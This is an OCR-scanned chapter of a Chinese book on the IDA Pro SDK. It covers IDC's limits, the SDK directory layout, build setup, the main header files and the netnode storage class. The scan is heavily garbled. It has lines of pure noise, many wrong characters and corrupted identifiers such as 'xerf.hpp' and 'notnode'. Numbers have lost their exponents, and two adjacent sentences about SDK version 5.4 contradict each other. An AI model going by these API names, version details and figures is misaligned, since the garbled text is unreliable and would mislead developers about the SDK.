脚本 非常 适用 于 小 型 任务 和 快速 开发 工作 ， 但 它们 并 不 能 解决 一 切 问题 。 

IDC 语 言 的 一 个 主要 限制 在 于 它 不 支持 复杂 的 数据 类 型 ,并 且 无 法 访问 功能 更 加 全 面 的 APT, 
如 C 标 准 库 或 Windows API。 如 果 以 更 高 的 复杂 性 为 代价 ， 我 们 可 以 用 编译 扩展 代替 脚本 扩展 ， 
以 消除 这 些 限 制 。 如 下 一 章 所 述 ， 编 译 扩展 需要 使 用 IDA SDK, 与 IDC 相 比 ， 这 个 工具 更 加 难 
以 掌握 。 但 是 ，SDK 在 开发 扩展 方面 的 实力 完全 值得 你 付出 努力 ， 学 习 如 何 使 用 这 个 工具 。 























(D 参见 http://old.idapalace.net/。 


IDA 软件 开发 工具 忆 





本 书 中 ， 我 们 经 常 使 用 “IDA 这 样 做 ”和 “IDA 那样 做 ”之 类 的 短语 。 虽 然 IDA 

E 确实 能 够 帮助 我 们 做 大 量 工作 ， 但 是 ， 确 切 地 说 ， 它 的 智能 要 归功 于 它 依赖 的 各 

种 模块 。 例 如 处 理 融 模块 ， 它 负责 做 出 分 析 阶 段 的 各 种 决策 。 因 此 ， 你 可 以 说 ，IDA 不 过 和 

它 所 依赖 的 处 理 器 模块 一 样 聪明 。 当 然 ，Hex-Ravys 付出 了 巨大 的 努力 ， 以 确保 它 的 处 理 器 

模块 始终 具有 强大 的 功能 。 对 于 一 般 用 户 而 言 , IDA 的 模块 体系 结构 完全 隐藏 在 它 的 用 户 界 

面 之 下 。 

有 时候， 你 可 能 需要 比 IDC 脚本 语言 更 加 强大 的 功能 ， 不 管 是 为 了 提高 性 能 ， 还 是 为 了 完 

成 IDC 无 法 完成 的 任务 。 这 时 ， 你 需要 使 用 DA 的 SDK (软件 开发 工具 包 ) 构建 你 自己 的 编译 
模块 ， 以 供 DA 使 用 。 











WB IDCD0000 DAN SDKD00000 IDCOOOOOOOOOOOO0OODO SDKO 
IDDUDUDUDUDUOUIUDUDUDUDUDUDCUDUDUDDUDUDUDU SbDKI FI L 
IDUDDUUDUUUDOIUDUDUDUDUDUDU IDCDDOUSDKDODDUODUDULUULU LU 
UU SbDKTILLD DID OD BeYU L 





SDK 以 C++ 库 和 连接 这 些 库 所 需 的 头 文件 的 形式 呈现 IDA 的 内 部 编程 接口 。 使 用 SDK， 你 
可 以 创建 加 载 带 模 块 以 处 理 新 的 文件 格式 ， 创 建 处 理 融 模块 以 反 汇编 新 的 CPU 指令 集 ， 或 者 创 
建 用 于 蔡 代 脚本 的 已 编译 的 、 更 加 强大 的 插件 模块 。 


附加 说 明 
HIE erp D Oo B HT C B [HI E). es] o p E HD B D HD. D 599 8 D [HI D E ETT CD [H 
D E OE a E OE E o e E EE a oE o o E DD Bp  OOOOOODOOUOOUULOLULUL LL 
E E E o a IER EHI EIE LE IBI. e [EET E HO EK Er Dr D e E BIET E 
ELO oE oA a EE a o E HE B BIB: e E DO E E o E CBE E o Or B DH e 
U EEU D E oA Ss e e e a a a a E e a e E a E a a a 5l 
ugagdgullillillllillii d HOT S a a a HEBEL DO HEBEL UU kemwin.hppf] DUDU 
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exec request t[] execute a kk "DU 
ij IDA[] ILLO TL BLO DUEB D UB LI D] 


在 本 革 中 ， 我 们 将 介绍 SDK 的 一 些 核心 功能 。 你 会 发 现 ， 在 创建 插件 、 加 载 硕 模块 或 处 理 
船 模 块 时 ， 这 些 功能 很 有 用 。 因 为 我 们 将 在 后 面 3 章 中 分 别 介绍 这 些 配 块 ， 因 此 ， 在 本 章 的 例子 
中 ， 我 们 将 不 介绍 它们 的 应 用 。 


16.1 SDK 简介 


SDK 的 发 布 方式 与 我 们 之 前 讨论 的 IDA 几乎 完全 相同 。 你 可 以 在 最 初 的 IDA 光盘 中 找到 包 
含 SDK 的 Zip 文件 ， 被 授权 用 户 也 可 以 从 Hex-Rays 网 站 下 载 SDK。SDK 的 每 一 个 版 本 都 以 与 
其 兼容 的 IDA 版 本 命名 ( 例如 ，idasdk61.zip 适 用 于 IDA 6.1 ht) 与 IDA 的 其 他 工具 一 样 ，IDA 
最 大 限度 地 简化 了 与 SDK 有 关 的 文档 资料 。 与 SDK 有 关 的 文档 资料 包括 一 个 顶级 readme.txt X 
件 ， 以 及 其 他 针对 插件 、 处 理 需 模块 和 加 载 磊 的 README 文件 。 

SDK 定义 模块 用 于 与 IDA 交互 的 各 种 已 发 布 编程 接口 。 在 SDK 4.9 版 之 前 ， 由 于 这 些 接 口 
发 生变 化 ， 一 个 能 够 在 SDK 4.8 中 成 功 编译 的 模块 ， 如 果 不 加 以 修改 ， 将 无 法 在 新 版 SDK (如 
4.9 版 ) 中 编译 ， 这 种 情况 并 不 少见 。 随 着 SDK 4.9 版 的 引入 ，Hex-Rays 决定 对 现 有 的 API 进行 
标准 化 ， 这 表示 ， 要 使 用 新 版 SDK 成 功 编译 ,模块 不 仪 不 需要 经 过 修改 ， 而 且 ， 模块 还 能 与 新 
版 IDA 二 进 制 兼容 。 这 意味 着 ， 每 次 IDA 发 布 新 版 本 时 ,模块 用 户 不 再 需要 等 待 模块 开发 者 更 
新 他 们 的 源 代码 , 或 为 他 们 的 模块 提供 更 新 的 二 进 制版 本 。 但 是 , 这 并 不 表示 现 有 的 API 接口 被 
完全 “冻结 ”。Hex-Rays 会 继续 通过 新 版 的 SDK 推出 新 功能 。( 也 就 是 说 ,每 个 新 版 的 SDK 都 是 
其 之 前 所 有 版 本 的 集合 ) 通常 ， 这 些 最 新 功能 的 模块 无 法 与 旧版 的 IDA 或 SDK 兼容 。( 也 就 是 
说 ， 有 了 时候 一 些 函 数 可 能 因为 各 种 原因 被 重 命名 或 被 标记 为 废弃 。SDK 提供 各 种 宏 以 允许 或 禁 
止 使 用 废弃 的 郴 数 ， 因 此 如 果 某 个 函数 被 废弃 ， 你 很 容易 就 会 注意 到 这 种 情况 ) 












































16.1.1 ZRSDK 


在 5.4 版 本 之 前 ， 包 含 SDK 的 Zip 文件 并 不 提供 顶级 目录 。 因 为 SDK 的 几 个 子 目录 的 名 称 
5 IDA 的 子 目 录 的 名 称 相同 ,， 因 此， 强烈 建议 你 创建 一 个 专用 的 SDK 目录 (比如 idasdk53 )， 并 
将 SDK 文件 提取 到 这 个 目录 中 。 这 使 得 你 更 容易 将 SDK 组 件 与 DA 组 件 区 分 开 来 。 在 5.4 版 本 
之 前 ，IDASDK 在 顶级 SDK 目录 (比如 idasdk61 ) 中 打包 ， 因 此 不 再 需要 这 一 步 。 你 没有 必要 
将 SDK 安装 到 <IDADIR> 中 的 指定 位 置 。 无 论 在 哪 安装 SDK， 在 本 书 的 剩余 部 分 ， 我 们 将 统一 
把 <SDKDIR> 作 为 SDK 的 安装 目录 。 























16.1.2 ” SDK 的 布局 
基本 了 解 SDK 目录 的 结构 ,不 仅 有 助 于 你 找到 SDK 文档 , 而 且 可 帮助 你 找到 构建 的 模块 的 


D 阻塞 操作 是 使 程序 在 等 待 一 项 操作 完成 时 停止 运行 的 操作 。 








位 置 。 下 面 逐个 介绍 SDK 目录 。 

O bin 目录。 这 个 目录 是 示例 构建 脚本 在 成 功 构 建 后 保存 其 编译 模块 的 位 置 。 要 安装 一 个 模 
块 , 你 需要 将 该 模块 由 bin 下 的 相应 子 目录 复制 到 <IDADIR> 下 的 相应 子 目录 中 。 模块 安装 
将 在 第 17 草 ~ 第 19 章 详细 讨论 。 这 个 目录 还 包含 一 个 创建 处 理 咒 模块 所 需 的 后 续 处 理工 
F (post-processing tool )。 

D etc 目 录 。 这 个 目录 包含 构建 一 些 SDK 模 块 所 需 的 两 个 实用 工具 的 源 代码 。SDK 还 提供 这 
些 实 用 工具 的 编译 版 本 。 

口 include 目 录 。 这 个 目录 包含 定义 IDA API 接 口 的 头 文件 。 简 而 言 之 , 可 以 使 用 的 每 一 种 API 
数据 结构 和 可 以 调用 的 每 一 个 API 函 数 都 在 这 个 目录 中 的 头 文 件 中 声明 。SDK 的 顶级 
readme.txt 文 件 答 要 介绍 了 这 个 目录 中 的 一 些 较为 稼 用 的 头 文 件 。 这 个 目录 中 的 文件 大 部 
分 属于 SDK 的 文档 。 

a ldr 目 录 。 这 个 目录 包含 儿 个 加 载 器 模块 的 源 代码 和 构建 脚本 。 加 载 右 的 README 文 件 不 
过 是 这 个 目录 的 内 容 纲 要 。 

a lib 目 录 。 这 个 目录 中 包含 许多 子 目 录 ， 其 中 分 别 包 含 构 建 各 种 IDA 模 块 所 需 的 链接 库 。 这 
些 子 目录 根据 它们 所 针对 的 编 诺 希 进 行 命名 。 例 如 ，x86_win_vc_32 (6.1 及 更 高 版 本 ) 或 
vc.w32〈6.0 及 较 低 版 本 ) 子 目录 包含 用 于 Visual Studio 和 Windows 上 的 32 位 IDA 的 库 ， 而 
x64 mac gcc 64(6.1 及 更 高 版 本 ) 或 gcc64.mac64( 6.0 及 较 低 版 本 ) 子 目 录 包 含 用 于 OSX 
上 的 64 位 IDA 的 库 。 

O module 目 录 。 这 个 目录 包含 几 个 示例 处 理 需 模块 的 源 代 码 和 构建 脚本 。 处 理 需 模块 的 
README 文 件 不 过 是 这 个 目录 的 内 容 纲要 。 

O plug-ins 目 录 。 这 个 目录 包含 几 个 示例 插件 模块 的 源 代码 和 构建 脚本 。 插件 的 README 文 
件 提供 了 插件 体系 结构 的 总 体 概述 。 

O 顶级 目录 。 SDK 的 顶级 目录 包含 几 个 用 于 构建 模块 的 生成 文件 , 以 及 SDK 的 主要 readme.txt 
文件 。 其 他 几 个 install xxx.txt 文 件 包含 与 安装 和 配置 各 种 编译 带 有 关 的 信息 ( 例如， 
install visual.txti] i6 I Visual Studio 配 置 )。 

记 住 ， 有 关 如 何 使 用 SDK 的 文档 非常 稀少 。 多 数 开发 者 主要 通过 反复 试验 、 发 现 错误 和 论 
入 探索 SDK 的 内 容 来 获得 有 关 SDK 的 知识 。 你 也 可 以 将 问题 张贴 到 Hex-Rays 文 持 论坛 的 
Research & Resources (研究 与 资源 ) WiP, WRAAE, HAZ SDK 的 IDA 用 户 可 能 会 
回答 你 的 问题 。Steve Micallef 所 著 的 IDA Plug-in Writing in C/C++ 是 介绍 SDK 和 插件 编写 的 优 
秀 第 三 方 资源 。 


















































16.1.3 配置 构建 环境 


使 用 SDK 的 一 个 令 人 诅 丧 的 经 历 与 编程 根本 无 天 。 但 你 会 发 现 ， 编 写 一 个 问题 的 解决 方案 
代码 相对 较为 容易 ,但 要 成 功 构建 你 的 模块 ， 却 几乎 不 可 能 做 到 。 事 实 确实 如 此 ， 因 为 仅仅 使 用 








(D 参见 http://www.binarypool.com/idapluginwriting/。 
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一 个 代码 库 ,， 你 很 难为 大 量 编译 天 提供 文 持 。 使 情况 更 加 复杂 的 是 ，Windows irani P HJ EE XC 
bad Te, 

创建 SDK 中 的 所 有 示例 的 目的 是 为 了 使 用 Borland 工具 构建 它们 。 在 install make.txt 中 ,我 
们 发 现 以 下 引 自 Tlfak 的 话 : 


WIN3200D0 Borland C++ CBuilder v4.00 000000000 BCCv5.20000000 
uut 


也 就 是 说 ， 其 他 install xxx 文件 提供 了 如 何 使 用 其 他 编译 需 成 功 构 建 模块 的 信息 。 一 些 示 例 
模块 包含 使 用 Visual Studio 构建 的 文件 ( 例如 , <SDKDIR>/plugins/vesample ), 而 install visual.txt 
提供 了 一 系列 步骤 ， 可 以 使 用 Visual C++ Express 2005 正确 配置 SDK 项 目 。 

为 了 使 用 Unix 风格 的 工具 、 在 一 种 Unix 风格 的 系统 ( 如 Linux ) 上 或 使 用 MinGW 之 类 的 
环境 构建 模块 ，SDK 提供 了 一 个 名 为 idamake.pl 的 脚本 ， 它 可 在 开始 构建 过 程 之 前 ， 将 Borland 
风格 的 生成 文件 转换 成 Unix 风格 的 生成 文件 。 这 个 过 程 由 install linux.txt 文件 描述 。 
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Steve Micallef HJF bg LEO T A CIE DIE OO DD, DLE H a RP ARE n TA EE TIRTT o 
在 为 Windows 版 本 的 IDA 构建 SDK 模块 时 ， 我 们 偏好 于 使 用 MinGW 工具 gcc 和 make。 第 17 
章 ~ 第 19 章 所 举 的 例子 中 包括 一 些 并 不 依赖 SDK 上 自 带 的 任何 构建 脚本 的 生成 文件 和 Visual 
Studio 项 目 文件 ， 你 可 以 轻松 对 它们 进行 修改 ， 以 满足 自己 的 项 目 要 求 。 特 定 于 模块 的 构建 配置 
将 分 别 在 这 3 章 中 讨论 。 


16.2 IDA 应 用 编程 接口 


IDA 的 API 由 <SDKDIR>/include 目录 中 的 头 文 件 定 义 。 关 于 可 用 的 API KA, TD 
完整 的 目录 (不 过 Steve Micallef 在 他 的 插件 编写 指南 中 已 经 收集 了 一 部 分 APIPÉZE). 最初， 许 
多 潜在 的 SDK 程序 员 很 难 接受 这 一 事实 。 实际 上 , 对 于 “我 如 何 使 用 SDK 做 ……? ”这 个 问题 ， 
从 来 没有 简单 的 答案 。 要 想 获得 这 类 问题 的 答案 ， 可 以 采取 两 种 途径 : 将 这 些 问题 粘贴 到 IDA 
的 用 户 论 坛 , 或 者 搜索 API 文档 尝试 自己 找到 答案 。 你 可 能 会 问 , 该 搜索 哪些 文档 呢 ? 当然 是 头 
文件 文档 ! 虽然 这 些 文档 并 不 是 最 便于 搜索 的 文档 , 但 是 , 其 中 确实 包含 API 的 所 有 功能 。 这 时 ， 
你 可 以 使 用 grep 工具 ( 或 者 一 个 适当 的 奉 代 工具 ， 最 好 是 内 置 在 编程 编辑 器 中 )。 不过， 关键 是 
你 要 知道 搜索 什么 内 容 ， 因 为 这 并 不 总 是 非常 明显 。 

有 一 些 方法 可 以 帮助 你 缩小 搜索 范围 。 首 先 ， 利 用 你 所 和 擎 握 的 IDC 脚本 语言 知识 ， 使 用 关键 
FRM DC 中 获得 的 函数 名 称 ， 设 法 在 SDK 中 找到 类 似 的 功能 。 但 是 ， 令 人 非常 肖 丧 的 是 ， 虽 
然 许 多 SDK 函数 的 用 途 与 IDC 函数 的 用 途 完全 相同 ， 但 这 些 困 数 的 名 称 却 很 少 相 同 。 这 使 得 程 
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序 员 需要 学 习 两 组 API 调 用 ， 一 组 用 于 IDC， 一 组 用 于 SDK。 为 了 解决 这 个 问题 ， 我 们 在 附录 B 
中 提供 了 一 个 完整 的 列表 ， 其 中 列 出 了 IDC 函数 及 用 于 执行 这 些 图 数 的 对 应 的 SDK 6.1 操作 。 

缩小 SDK 相关 搜索 范围 的 第 二 种 方法 是 熟悉 各 种 SDK 头 文件 的 内 容 和 作用 〈 更 为 重要 )。 
通常 ， 涉 文件 会 根据 孔 数 类 型 为 相关 的 函数 和 数据 结构 分 组 。 例 如 ， 处 理 用 户 交 互 的 SDK PAZ 
归 入 kernwin.hpp 文件 。 如 果 通 过 grep 之 类 的 搜索 无 法 确定 你 需要 的 功能 ， 那么， 了解 与 该 功能 
有 关 的 头 文 件 信息 ， 将 可 以 帮助 你 缩小 搜索 范围 ， 减 少 需要 深入 分 析 的 文件 的 数量 。 


16.2.1 头 文 件 概述 


虽然 SDK 的 readme.txt 文件 概括 介绍 了 大 多 数 稍 用 的 头 文 件 , 但 是 , 在 这 一 市 中 , 我 们 重点 
说 明 其 他 一 些 与 这 些 文件 有 关 的 信息 。 首 先 ,， 绝 大 多 数 头 文件 使 用 .hpp 作为 后 级 , 但 也 有 一 些 文 
件 使 用 .h 作为 后 级 。 在 命名 将 要 包含 在 文件 中 的 头 文件 时 ， 这 很 可 能 会 导致 细小 的 错误 。 其 次 ， 
ida.hpp 是 SDK 的 主要 头 文 件 ， 该 文件 应 包括 在 所 有 与 SDK 有 关 的 项 日 中 。 最 后 ，SDK 利用 预 
处 理 指令 阻止 用 户 访问 那些 Hex-Rays A NIER HY KZE (UN stropy 和 sprintf )。 有关 所 有 这 些 辑 
数 的 完整 内 容 ， 请 参考 pro.h 头 文件 。 要 恢复 对 这 些 冰 数 的 访问 ,在 将 ida.hpp 包含 在 你 自己 的 文 
件 中 之 前 ， 必 须 定义 USE DANGEROUS FUNCTIONS 宏 ， 如 下 所 示 : 





















































#define USE DANGEROUS FUNCTIONS 
#include «ida.hpp» 








如 采 没 有 定义 USE DANGEROUS FUNCTIONS ZZ, 将 导致 一 个 构建 错误 ， 其 大 致意 思 是 : dont 
use_snprintf 是 一 个 未 定义 的 符号 ( 如 果 尝 试 使 用 snprintf 函数 )。 为 了 “补偿 ”对 这 些 所 谓 的 
危险 函数 的 限制 ,SDK 为 每 个 孔 数 定义 了 更 加 安全 的 蔡 代 函数 , 这 些 函 数 通 常 采 用 qstrXXXX 的 形 
式 ， 如 gstrncpy 和 qsnprintf。 这 些 更 加 安全 的 函数 也 是 在 pro.h 文件 中 声明 的 。 

同样 ，SDK 还 限制 用 户 访 问 许 多 标准 文件 输入 /输出 变量 和 函数 ， 如 stdin, stdout, fopen, 
fwrite 和 fprintf。 这 种 限制 部 分 是 由 于 Borland 编译 器 的 局 限 性 所 致 。 对 于 这 些 函 数 ，SDK 同 
EW ENDEX TERAZ, ENIAN qXXX 的 形式 ， 如 qfopen 和 qfprintf。 如 果 你 需要 访问 标 
准 文件 函数 , 那么 , 在 包含 fpro.h 文件 之 前 , 你 必须 定义 USE STANDARD FILE FUNCIONS 宏 。( fpro.h 
文件 由 kernwin.hpp 包含 ， 后 者 又 由 其 他 几 个 文件 包含 。) 

多 数 情 况 下 ， 每 个 SDK 头 文 件 都 包含 一 段 简要 描述 ， 说 明 这 个 文件 的 作用 ， 并 用 相当 详细 
的 注释 介绍 在 这 个 文件 中 声明 的 数据 结构 和 吗 数 。 这 些 注释 构成 了 IDA 的 API 文档。 下 面 简 要 
说 明 一 些 常 用 的 SDK 头 文件 。 

O area.hpp。 这 个 文件 定义 area t 结 构 体 , 它 是 数据 库 中 的 一 个 相 邻 地 址 块 。 这 个 结构 体 作 

为 其 他 几 个 类 (根据 一 个 地 址 范围 构建 ) 的 基 类 。 你 很 少 需要 直接 包含 这 个 文件 ， 因 为 
它 通常 包含 在 定义 area t 的 文件 中 。 

O auto.hpp。 这 个 文件 声明 用 于 处 理 IDA 的 自动 分 析 屁 的 函数 。 如 果 IDA 并 不 忙于 处 理 用 户 

输入 事件 ， 目 动 分 析 带 将 执行 排队 分 析 任 务 。 

口 bytes.hpp。 这 个 文件 声明 处 理 各 个 数据 库 字 节 的 冰 数 。 在 这 个 文件 中 声明 的 冰 数 用 于 庶 
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数 有 关 的 标志 ， 另 外 一 些 函 数 则 用 于 修改 常规 注释 和 可 重复 注释 。 

D dbg.hpp。 这 个 文件 声明 的 函数 通过 编程 控制 IDA 调 试 器 。 

口 entry.hpp。 这 个 头 文件 声明 的 函数 用 于 处 理 文件 的 进入 点 。 对 于 共享 库 ， 每 个 导出 的 函 
数 或 数据 值 都 被 视 为 是 一 个 进入 点 。 

口 expr.hpp。 这 个 文件 声明 处 理 IDC 结 构 的 函数 和 数据 结构 ,你 可 以 在 模块 中 修改 现 有 的 IDC 
哨 数 ， 添 加 新 的 IDC 函 数 或 执行 IDC 语 句 。 

口 fpro.h。 这 个 文件 包含 前 面 讨论 的 文件 输入 /输出 蔡 代 子 数 ， 如 qfopen。 

口 frame.hpp。 这 个 头 文 件 包 含 用 于 操纵 栈 帧 的 函数 。 

O funcs.hpp。 这 个 涉 文 件 包 含 用 于 人 处理 经 过 反 汇 编 的 函数 的 函数 和 数据 结构 ， 以 及 用 于 处 
FEFLIRTAS 44 H3 PRA. 

D gdl.hpp。 这 个 文件 为 使 用 DOT 或 GDL 生 成 图 形声 明 支 持 例 程 。 

O ida.hpp。 这 个 文件 是 处 理 SDK 所 需 的 主要 头 文件 ， 其 中 包含 idainfo 结 构 的 定义 和 全 局 变 
量 inf 的 声明 ， 还 包含 许多 字段 ， 一 些 字 段 提 供与 当前 数据 库 有 关 的 信息 ， 另 一 些 字 段 则 
由 配置 文件 设置 初始 化 。 

O idp.hpp。 这 个 文件 包含 一 些 结构 体 的 声明 ， 这 些 结构 体 构成 处 理 需 模块 的 基础 。 描 述 当 
前 处 理 需 模块 的 全 局 变量 ph 和 描述 当前 汇编 右 的 全 局 变量 ash 也 在 这 个 文件 中 定义 。 

O kernwin.hpp。 这 个 文件 声明 用 于 处 理 用 户 交 互 和 用 户 界 面 的 图 数 。 这 个 文件 还 声明 了 SDK 
中 替代 IDC 的 AskXXX 函 数 的 函数 ， 以 及 用 于 设置 显示 位 置 和 配置 热 键 关联 的 函数 。 

O lines.hpp。 这 个 文件 声明 用 于 生成 格式 化 的 彩色 反 汇 编 行 的 函数 。 

口 loader.hpp。 这 个 文件 包含 分 别 用 于 创建 加 载 右 模块 和 插件 模块 的 1oader t 和 plugin t£ii 
构 体 的 声明 ， 以 及 用 于 加 载 文 件 和 激活 插件 的 函数 的 声明 。 

D name.hpp。 这 个 文件 声明 用 于 操纵 已 命名 位 置 (《 相 对 于 结构 或 栈 帧 中 的 名 称 ， 它 们 分 别 
在 stuct.hpp 和 funcs.hpp 中 声明 ) DU PRAE. 

O netnode.hpp。 网 络 市 点 是 通过 API 访 问 的 最 低级 的 存储 结构 。 通 常 ，IDA 的 用 户 界 面 
完全 隐藏 了 网 络 节 点 细节 。 这 个 文件 包含 notnode 类 的 定义 及 用 于 网 络 节 点 低级 操纵 的 

O pro.h。 这 个 文件 包含 任何 SDK 模 块 所 需 的 顶级 类 型 定义 和 宏 。 不 需要 明确 将 这 个 文件 包 
含 在 你 的 项 目 中 ， 因 为 ida.hpp 已 经 包含 它 了 。 男 外 ，IDA SDK_VERSION 宏 也 在 这 个 文件 中 
定义 。IDA SDK_VERSION 宏 可 用 于 确定 一 个 模块 正 使 用 哪个 版 本 的 SDK 构 建 。 在 使 用 不 同 
的 SDK 版 本 时 ,你 还 可 以 对 它 进行 测试 ,以 提供 条 件 编 译 。 需 要 注意 的 是 , IDA SDK VERSION 
由 SDK 5.2 引 入 。 在 SDK 5.2 之 前 ， 并 没有 正式 的 方法 确定 模块 使 用 的 是 什么 版 本 的 SDK。 
本 书 的 网 站 上 提供 有 一 个 非 正式 的 头 文件 ( sdk_versions.h )， 它 为 较 低 版 本 的 SDK 定 义 了 
IDA SDK VERSION A. 

D search.hpp。 这 个 文件 声明 对 数据 库 进 行 各 种 搜索 的 函数 。 

口 segment.hpp。 这 个 文件 包含 segment t% (area t 的 一 个 子 类 ) 的 声明 segment t 类 用 







































































于 描述 二 进 制 文件 的 各 节 《〈 如 .text、.data 等 )。 这 个 文件 还 声明 了 用 于 处 理 段 的 吨 数 。 
O struct.hpp。 这 个 文件 声明 struc t 类 以 及 操纵 数据 库 中 的 结构 的 函数 。 
O typeinf.hpp。 这 个 文件 声明 用 于 人 处理 IDA 类 型 库 的 函数 。 男 外 ， 在 这 个 文件 中 声明 的 函数 
还 可 用 于 访问 函数 签名 ,包括 消 数 返 回 类 型 和 参数 序列 。 
O ua.hpp. 这 个 文件 声明 在 处 理 咒 模块 中 大 量 使 用 的 op t 和 insn t 类 。 这 个 文件 还 声明 了 用 
于 反 汇 编 各 条 指令 ， 以 及 为 每 个 反 汇 编 行 的 各 个 部 分 生成 文本 的 呆 数 。 
O xerf.hpp。 这 个 文件 声明 添加 、 删 除 和 遍历 代码 和 数据 交叉 引用 所 需 的 数据 类 型 和 也 数 。 
上 面 介 绍 了 SDK 自 带 的 大 约 一 半 的 头 文件 。 但 是 ,在 你 深入 学 习 SDKE 时 ， 建 议 你 不 但 要 了 
解 这 个 列表 中 的 文件 ， 还 要 熟悉 其 他 所 有 的 涉 文 件 。 已 发 布 的 API 因数 这 有 ida export 标记 。 
SDK 自沉 的 链接 库 仪 导出 带 有 ida export 标记 的 函数 。 请 不 要 因为 使 用 idaapi 而 产生 误解 ， 
为 它 仅 仅 表示 一 个 函数 只 有 在 Windows 平台 上 才 使 用 stdcall 调用 约定 。 有 时 候 , 你 可 能 会 遇 到 
一 些 不 带 ida export 标记 的 函数 ， 你 不 能 在 模块 中 使 用 这 些 也 数 。 


16.2.2 网络 市 点 


IDA 的 许多 API 以 C++ 类 为 基础 创建 , 它 模 拟 一 个 经 过 反 汇 编 的 二 进 制 文件 的 各 方 。 男 一 方 
面 ，netnode 类 则 有 些 神秘 ， 因 为 它 似乎 与 二 进 制 文件 的 结构 ( 如 节 、 函 数 、 指 令 等 ) 没有 任何 
直接 关系 。 

网 络 节 点 是 IDA 数据 库 中 最 低级 和 最 通用 的 数据 存储 机 制 。 作 为 一 名 模块 程序 员 ， 你 很 少 
需要 直接 操作 网 络 市 点 。 许多 较为 高 级 的 数据 结构 均 隐 藏 了 一 个 事实 ， 即 它们 最 终 都 需要 依 徘 网 
络 节 点 永久 存储 在 数据 库 中 。nalt.hpp 文件 详细 说 明了 在 数据 库 中 使 用 网 络 节 点 的 一 些 方法 。 例 
如 ， 通 过 这 个 文件 ， 我 们 知道 ， 与 二 进 制 文件 叶 入 的 共 至 库 和 孔 数 有 关 的 信息 存储 在 一 个 名 为 
import node 的 网 络 市 点 中 (是 的 , 网 络 太 点 也 有 和 名称 )。 网 络 市 点 还 是 IDC 全 局 数组 的 永久 存储 
Hal. 

网 络 市 点 由 netnode.hpp LEMIRE. (DS Mumm, MATRE IDA 的 内 部 存储 
结构 ， 其 用 途 非常 广泛 。 尽 管 如 此 ， 即 使 是 SDK 程序 员 也 不 知道 它们 的 具体 结构 。 为 了 提供 一 
个 访问 这 些 存储 结构 的 接口 ，SDK 定义 了 netnode 类 , 它 就 像 是 这 个 内 部 存储 结构 的 “不 透明 包 
ST. netnode 类 包含 唯一 一 个 数据 成 员 ， 即 netnodenumber ， 它 是 一 个 用 于 访问 网 络 节 点 的 内 部 
表示 形式 的 整数 标识 符 。 每 个 网 络 节点 由 它 的 netnodenumber 唯一 标识 。 在 32 位 系统 上 ， 
netnodenumber 是 一 个 32 位 整数 ,可 以 表示 2 六 个 唯一 的 网 络 节点 。 在 64 位 系统 上 , netnodenumber 
是 一 个 64 位 整数 ， 可 以 表示 29 个 唯一 的 网 络 节点 。 多 数 情 况 下 ，netnodenumber 代表 数据 库 中 的 
一 个 虚拟 地 址 , 它 在 数据 库 中 的 每 个 地 址 与 存储 和 某 地 址 有 关 的 信息 所 需 的 网 络 节点 之 间 建 立 一 个 
目 然 的 对 应 关系 。 任 何 与 一 个 地 址 有 关 的 信息 〈 如 注释 ) 都 存储 在 与 这 个 地 址 有 关 的 网 络 节 点 中 。 

要 操纵 网 络 节点 ， 建 议 你 使 用 一 个 实例 化 的 netnode 对 象 调用 netnode 类 的 成 员 函 数 。 浏 览 
netnode.hpp 文件 ， 你 会 发 现 ， 有 许多 非 成 员 哨 数 似乎 也 可 用 于 操纵 网 络 市 点 。 相 对 于 成 员 也 数 ， 
我 们 不 鼓励 使 用 这 些 函 数 。 但 是 ， 你 会 注意 到 ，netnode 类 中 的 大 多 数 成 员 函 数 都 是 某 个 非 成 员 
PRŽI "Jl (thin wrapper )。 
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在 SDK 内 部 , 网 络 节 点 可 用 于 存储 几 种 不 同类 型 的 信息 。 每 个 网 络 节点 都 有 一 个 最 长 达 512 
个 字符 的 名 称 和 一 个 最 长 达 1024 个 字 节 的 主 值 。netnode 类 的 成 员 函 数 用 于 检索 (name ) 或 修改 
( rename ) 网 络 斑点 的 名 称 。 其 他 成 员 函 数 可 按 整数 (set long. long value ) FIFE set, valstr) 
或 任意 二 进 制 大 对 象 (set. 、valobj ) “处 理 网 络 节点 的 主 值 。 处 理 主 值 的 方式 由 你 所 使 用 的 函数 
决定 。 

使 情况 更 加 复杂 的 是 : 除了 名 称 和 主 值 外 ， 每 个 netnode 还 能 够 存储 256 rr EH. Hui 
的 数组 元 系 可 以 为 任意 大 小 ， 最 大 为 1024 个 字 节 。 这 些 数组 分 为 3 RIUH GL SCERHUZSAS, S28 
数组 使 用 32 位 索引 值 ， 最 多 可 以 保存 40 亿 个 数组 元 素 。 第 二 类 数组 使 用 8 位 索引 值 ， 最 多 可 以 
保存 256 个 数组 元 系 。 最 后 一 类 数组 实际 上 是 使 用 字符 串 作 为 密 钥 的 散 列 表 。 无 论 使 用 哪 一 类 数 
组 ， 数 组 中 的 每 个 元 素 能 接受 的 值 最 大 为 1024 个 字 节 。 简 言 之 ， 一 个 网 络 节点 可 以 存储 数量 极 
其 庞大 的 数据 ， 现 在 我 们 只 需要 了 解 这 一 点 是 如 何 做 到 的 。 

或 许 你 和 希望 知道 这 些 信息 全 都 存储 在 什么 地 方 ， 当 然 ， 你 并 不 是 唯一 想 了 解 这 个 问题 的 人 ! 
在 IDA 数据 库 中 ， 网 络 节点 的 所 有 内 容 都 存储 在 二 又 树 节 点 中 。 二 义 树 节点 反 过 来 又 存储 在 一 
个 ID0 文 件 中 , 在 关闭 数据 库 时 , IDO 文件 又 存储 在 一 个 IDB 文件 中 ,在 IDA 的 任何 显示 窗口 中 ， 
你 都 不 可 能 看 到 你 创建 的 任何 网 络 节 点 内 容 。 你 可 以 任意 操纵 这 些 数据 。 因 此 ,对 于 你 希望 用 来 
存储 调用 结果 的 任何 插件 和 脚本 而 言 ， 网 络 市 点 是 永久 存储 它们 的 理想 位 置 。 

1. 创建 网 络 贡 点 

关于 网 络 世 点 ， 有 一 个 令 人 迷惑 的 地 方 ， 即 在 你 的 一 个 模块 中 声明 一 个 netnode 变量 ， 并 不 
一 定 会 在 数据 库 中 创建 该 网 络 节 点 的 内 部 表示 形式 。 只 要 满足 以 下 其 中 一 个 条 件 ,， 就 可 以 在 数据 
库 内 部 创建 一 个 网 络 节 点 。 

口 网 络 节 点 分 配 有 一 个 名 称 。 

口 网 络 节 点 分 配 有 一 个 主 值 。 

口 有 一 个 值 存储 在 网 络 市 点 的 一 个 内 部 数组 中 。 

有 3 个 构造 另 数 可 用 于 声明 模块 中 的 网 络 节 点 。 这 些 困 数 的 原型 包含 在 netnode.hpp 文件 中 ， 
